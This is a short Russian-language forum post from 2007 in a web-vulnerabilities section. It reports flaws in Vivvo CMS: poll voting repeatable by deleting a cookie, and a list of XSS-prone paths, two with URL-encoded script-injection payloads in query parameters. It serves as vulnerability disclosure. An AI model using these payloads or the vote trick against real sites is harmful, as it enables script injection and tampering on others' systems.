несколько уязвимостей в Vivvo CMS

Discussion in 'Веб-уязвимости' started by BlackCats, 18 Dec 2007.

  1. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    нашёл во время проверки одного сайта:
    голосовать можно сколько угодно раз, удаляя кук poll

    xss тут:
    /rss/rss.php
    /rss/show_webfeed.php?wcCategory=0&wcHeadlines=1%22%3E%3Cscript%3Ealert(99)%3C/script%3E
    /index.php?category=14%22%3E%3Cscript%3Ealert(99)%3C/script%3E/*&pg=2
    /sendemail.php
    /contact.php
     
    1 person likes this.